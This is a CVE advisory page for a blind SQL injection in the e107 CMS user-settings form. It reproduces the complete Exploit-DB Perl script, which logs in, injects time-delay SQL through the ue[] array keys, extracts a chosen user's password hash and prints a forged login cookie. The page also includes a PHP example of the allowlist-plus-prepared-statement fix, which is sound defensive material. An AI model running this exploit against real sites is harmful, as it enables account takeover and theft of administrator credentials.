CVE-2008-5320 : Detail

CVE-2008-5320

SQL Injection
A03-Injection
0.11%
V3
Network
2008-12-03
18h00 +00:00
2017-09-28
10h57 +00:00

CVE Description

SQL injection vulnerability in usersettings.php in e107 0.7.13 and earlier allows remote authenticated users to execute arbitrary SQL commands via the ue[] parameter.

CVE Information

Related Weaknesses

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

Metrics

CVSS V2: score 6.5, vector AV:N/AC:L/Au:S/C:P/I:P/A:P (source: nvd@nist.gov)

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0% to 100%). The higher the score, the greater the probability that the vulnerability will be exploited.

EPSS Percentile

The percentile ranks CVEs according to their EPSS score. For example, a CVE in the 95th percentile is more likely to be exploited than 95% of other CVEs. The percentile is therefore used to compare the EPSS score of one CVE with that of the others.

Exploit information

Exploit Database EDB-ID : 6791

Publication date : 2008-10-18 22h00 +00:00
Author : girex
EDB Verified : Yes

# Author: __GiReX__
# Homepage: http://girex.altervista.org
# Date: 19/10/2008
# CMS: e107
# URL: http://e107.org/
# Note: Works regardless of php.ini settings (magic_quotes, register_globals..)
# Attention: This exploit was written for educational purpose.
# Use it at your own risk. Author will not be responsible for any damage.
# Description: e107 is a content management system written in PHP
# and using the popular open source MySQL database system for content storage.
# It's completely free, totally customisable and in constant development.
# Bug description:
# e107 presents a vuln in usersettings.php (line 363-395), a POST array ($_POST['ue'])
# goes into an update query, it cleans the values of this array but not the keys name...
# File: usersettings.php (line 363-395)

    if($_POST['ue'])
    ...
        foreach($_POST['ue'] as $key => $val)
            $err = $ue->user_extended_validate_entry($val,$extList[$key]);
            if(!$err)
                $val = $tp->toDB($val);                 <== Cleans values
                $ue_fields .= $key."='".$val."'";       <== Here our $_POST['ue'] keys and values
        }
    }
    ...

# Lines: 496-500

    if($ue_fields)
    {
        // ***** Next line creates a record which presumably should be there anyway, so could generate an error
        $sql->db_Select_gen("INSERT INTO #user_extended (user_extended_id, user_hidden_fields) values ('".intval($inp)."', '')");
        $sql->db_Update("user_extended", $ue_fields." WHERE user_extended_id = '".intval($inp)."'");   <== Here vulnerable query
    }

# As you can see the return value of the update query isn't checked so we have to use a blind benchmark() method

#!/usr/bin/perl
# e107 <= 0.7.13 Blind SQL Injection Exploit
# Admin/User's Password Retrieve Exploit
# Works regardless of php.ini settings
# Coded by __GiReX__

use POSIX;
use LWP::UserAgent;
use HTTP::Cookies;
use Digest::MD5 qw(md5 md5_hex md5_base64);

if(@ARGV < 4)
{
    banner();
    print "[+] You need an user account to run this exploit\n\n";
    print "[+] Usage: perl $0 <host> <path> <your_username> <your_pass> <victim_id>\n";
    print "[+] Example: perl $0 localhost /e107/ test password 1\n";
    exit;
}

my $target = ($ARGV[0] =~ /^http:\/\//) ? $ARGV[0].$ARGV[1]: 'http://' . $ARGV[0].$ARGV[1];
my ($user, $pass, $id) = ($ARGV[2], $ARGV[3], ($ARGV[4]) ? $ARGV[4] : 1);

my $lwp = new LWP::UserAgent or die;
my $cookie_jar = new HTTP::Cookies or die;

$lwp->cookie_jar( $cookie_jar );

my @cset = (48..57, 97..102);
my $benchmark = 1000000;
my $prefix = "e107";
my $hash = "";

banner();

try_login($user, $pass) or die "[-] Unable to login with $user and $pass\n";

syswrite(STDOUT, "[+] Logged in with your account..\n".
                 "[+] Checking database delay, please wait..\n\n" );

$ndelay = check_bench("1=0");
print STDOUT "[+] Normal delay: $ndelay\n";

$bdelay = check_bench("1=1");
print STDOUT "[+] Benchmark delay: $bdelay\n\n";

if($bdelay - $ndelay < 4)
{
    print STDOUT "[-] Benchmarck delay too small compared to normal delay, increase it.\n";
    exit ();
}

for(my $j = 1; $j <= 32; $j++)
{
    foreach $char(@cset)
    {
        info(chr($char), $hash, "password");

        my ($pre_time, $post_time) = time();
        $rv = check_char($char, $j, "user_password");
        $post_time = time();

        if($rv and ($post_time - $pre_time) > ($ndelay + 3))
        {
            $hash .= chr($char);
            last;
        }
    }
    last if $j != length($hash);
}

if(not defined $hash or length($hash) != 32)
{
    print STDOUT "\n\n[-] Exploit mistake: please re-check benchmark\n";
    exit;
}
else
{
    print STDOUT "\n\n[+] You can try to login with this cookie:\n";
    print STDOUT "[+] Cookie: ${cookie_prefix}cookie=${id}.". md5_hex($hash)."\n";
}

sub try_login
{
    my ($user, $pass) = @_;

    my $res = $lwp->post( $target.'news.php' , [
        'username'  => $user,
        'userpass'  => $pass,
        'userlogin' => 'Login',
        'autologin' => '1'
    ] );

    if($res->status_line =~ /^302|200|301/ or $res->is_success)
    {
        if($res->as_string =~ /Set-Cookie: (.+)cookie/)
        {
            $cookie_prefix = $1;
            return 1;
        }
        return undef;
    }

    die ("[-] Unable to request ${target}news.php ".$res->status_line."\n");
}

sub info
{
    my($c, $cur, $str) = @_;
    $cur = '' unless defined $cur;
    print STDOUT "[+] Victim ${str}: ${cur}${c}\r";
    $| = 1;
}

sub check_bench
{
    my $true = shift;
    my $delay = 0;
    my $sql = "user_hidden_fields=99 AND CASE WHEN(${true}) THEN benchmark(${benchmark}, MD5(1)) END#";

    for(1..3)
    {
        my ($pre_time, $post_time) = time();
        my $res = $lwp->post( $target.'usersettings.php', [
            'email'          => 'damn@email.com',
            'updatesettings' => 'Save Settings',
            "ue[${sql}]"     => 'damn'
        ]);
        $post_time = time();
        $delay += int($post_time - $pre_time);
    }

    return ceil($delay / 3);
}

sub check_char
{
    my ($char, $n, $field) = @_ ;
    $rand = int($char + $n);

    my $sql = "user_hidden_fields=${rand} AND CASE WHEN(SELECT ASCII(SUBSTRING(${field},${n},1)) ".
              "FROM ${prefix}_user WHERE user_id=${id})=${char} THEN benchmark(${benchmark}, MD5(1)) END#";

    my $res = $lwp->post( $target.'usersettings.php', [
        'email'          => 'damn@email.com',
        'updatesettings' => 'Save Settings',
        "ue[${sql}]"     => 'damn'
    ]);

    return $res->is_success;
}

sub banner
{
    print "\n";
    print "[+] e107 <= 0.7.13 Blind SQL Injection\n";
    print "[+] Admin/User's Password Retrieve Exploit\n";
    print "[+] Coded by __GiReX__\n";
    print "\n";
}

# milw0rm.com [2008-10-19]
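The root cause in the excerpt above is that array keys from $_POST['ue'] reach the UPDATE statement unchanged while only the values are escaped. The following is an added example, not e107's own code and not part of the advisory: it reproduces that key-concatenation pattern in a minimal form and sets a hardened version beside it that accepts only keys found in a known-field allowlist (the role the excerpt's $extList lookup should have played) and binds values through PDO prepared statements. The table name, the $extList contents and the sample inputs are constructed for illustration.

```php
<?php
// Added example, not e107's code. Table/column names and the $extList
// allowlist are assumptions modelled on the advisory excerpt.
declare(strict_types=1);

// Assumed allowlist of extended-field definitions, keyed by column name,
// the way the excerpt's $extList is keyed. Constructed inline for the demo.
$extList = [
    'user_location' => ['type' => 'text'],
    'user_birthday' => ['type' => 'date'],
];

// VULNERABLE pattern (as in the excerpt): the value is cleaned, the key is
// copied into the statement verbatim, so a key carrying SQL becomes SQL.
function buildUpdateUnsafe(array $ue, int $inp, callable $toDB): string
{
    $ue_fields = '';
    foreach ($ue as $key => $val) {
        $val = $toDB($val);                                   // value is cleaned...
        $ue_fields .= ($ue_fields !== '' ? ', ' : '') . $key . "='" . $val . "'"; // ...key is not
    }
    return "UPDATE e107_user_extended SET " . $ue_fields
         . " WHERE user_extended_id = '" . $inp . "'";
}

// HARDENED: every key must be an exact allowlisted field name, the column
// identifier is additionally checked against a strict pattern, and values
// (and the id) are passed as bound parameters instead of being concatenated.
function buildUpdateSafe(array $ue, int $inp, array $extList): array
{
    $set = [];
    $params = [];
    foreach ($ue as $key => $val) {
        if (!is_string($key) || !array_key_exists($key, $extList)) {
            throw new InvalidArgumentException("Unknown extended field: " . $key);
        }
        if (!preg_match('/^[A-Za-z_][A-Za-z0-9_]*$/', $key)) {
            throw new InvalidArgumentException("Invalid field name");
        }
        $set[] = "`" . $key . "` = ?";
        $params[] = (string) $val;
    }
    if ($set === []) {
        throw new InvalidArgumentException("Nothing to update");
    }
    $params[] = $inp;
    $sql = "UPDATE e107_user_extended SET " . implode(', ', $set)
         . " WHERE user_extended_id = ?";
    return [$sql, $params];
}

// Execution through a prepared statement; the PDO connection is assumed
// to be created elsewhere. Returns the number of affected rows.
function applyUserExtended(PDO $pdo, array $ue, int $inp, array $extList): int
{
    [$sql, $params] = buildUpdateSafe($ue, $inp, $extList);
    $stmt = $pdo->prepare($sql);
    $stmt->execute($params);
    return $stmt->rowCount();
}

// Constructed inputs: one key shaped like an injected expression, one
// legitimate field with a value that needs proper quoting.
$hostile = ['user_hidden_fields=99 AND 1=1#' => 'damn'];
$benign  = ['user_location' => "O'Brien's town"];

// The unsafe builder lets the key land inside the statement:
echo buildUpdateUnsafe($hostile, 1, fn($v) => addslashes($v)), "\n";

// The hardened builder refuses it because it is not an allowlisted field:
try {
    buildUpdateSafe($hostile, 1, $extList);
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}

// And emits a parameterised statement for the legitimate field:
[$sql, $params] = buildUpdateSafe($benign, 1, $extList);
echo $sql, "\n";                  // UPDATE e107_user_extended SET `user_location` = ? WHERE user_extended_id = ?
echo json_encode($params), "\n";  // ["O'Brien's town",1]
```

The allowlist check is the fix that maps directly onto the advisory: the excerpt already looks up $extList[$key] to validate the value, so rejecting any key with no $extList entry closes the hole without changing the feature. The prepared statement is belt-and-braces for the values, which the original did escape with toDB().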

Products Mentioned

Configuration 0

E107>>E107 >> Version To (including) 0.7.13

E107>>E107 >> Version 0.7

E107>>E107 >> Version 0.7.1

E107>>E107 >> Version 0.7.2

E107>>E107 >> Version 0.7.3

E107>>E107 >> Version 0.7.4

E107>>E107 >> Version 0.7.5

E107>>E107 >> Version 0.7.6

E107>>E107 >> Version 0.7.7

E107>>E107 >> Version 0.7.8

E107>>E107 >> Version 0.7.9

E107>>E107 >> Version 0.7.10

E107>>E107 >> Version 0.7.11

E107>>E107 >> Version 0.547_beta

E107>>E107 >> Version 0.548_beta

E107>>E107 >> Version 0.549_beta

E107>>E107 >> Version 0.551_beta

E107>>E107 >> Version 0.552_beta

E107>>E107 >> Version 0.553_beta

E107>>E107 >> Version 0.554_beta

E107>>E107 >> Version 0.555_beta

E107>>E107 >> Version 0.600

E107>>E107 >> Version 0.601

E107>>E107 >> Version 0.602

E107>>E107 >> Version 0.603

E107>>E107 >> Version 0.604

E107>>E107 >> Version 0.605

E107>>E107 >> Version 0.606

E107>>E107 >> Version 0.607

E107>>E107 >> Version 0.608

E107>>E107 >> Version 0.609

E107>>E107 >> Version 0.610

E107>>E107 >> Version 0.611

E107>>E107 >> Version 0.612

E107>>E107 >> Version 0.613

E107>>E107 >> Version 0.614

E107>>E107 >> Version 0.615

E107>>E107 >> Version 0.615a

E107>>E107 >> Version 0.616

E107>>E107 >> Version 0.617

E107>>E107 >> Version 0.6171

E107>>E107 >> Version 0.6172

E107>>E107 >> Version 0.6173

E107>>E107 >> Version 0.6174

E107>>E107 >> Version 0.6175

E107>>E107 >> Version 5.1

E107>>E107 >> Version 5.3_beta

E107>>E107 >> Version 5.3_beta2

E107>>E107 >> Version 5.04

E107>>E107 >> Version 5.4_beta1

E107>>E107 >> Version 5.4_beta3

E107>>E107 >> Version 5.4_beta4

E107>>E107 >> Version 5.4_beta5

E107>>E107 >> Version 5.4_beta6

E107>>E107 >> Version 5.05

E107>>E107 >> Version 5.21

References

http://securityreason.com/securityalert/4683
Tags : third-party-advisory, x_refsource_SREASON
http://www.securityfocus.com/bid/31821
Tags : vdb-entry, x_refsource_BID
https://www.exploit-db.com/exploits/6791
Tags : exploit, x_refsource_EXPLOIT-DB
http://secunia.com/advisories/32322
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2008/2860
Tags : vdb-entry, x_refsource_VUPEN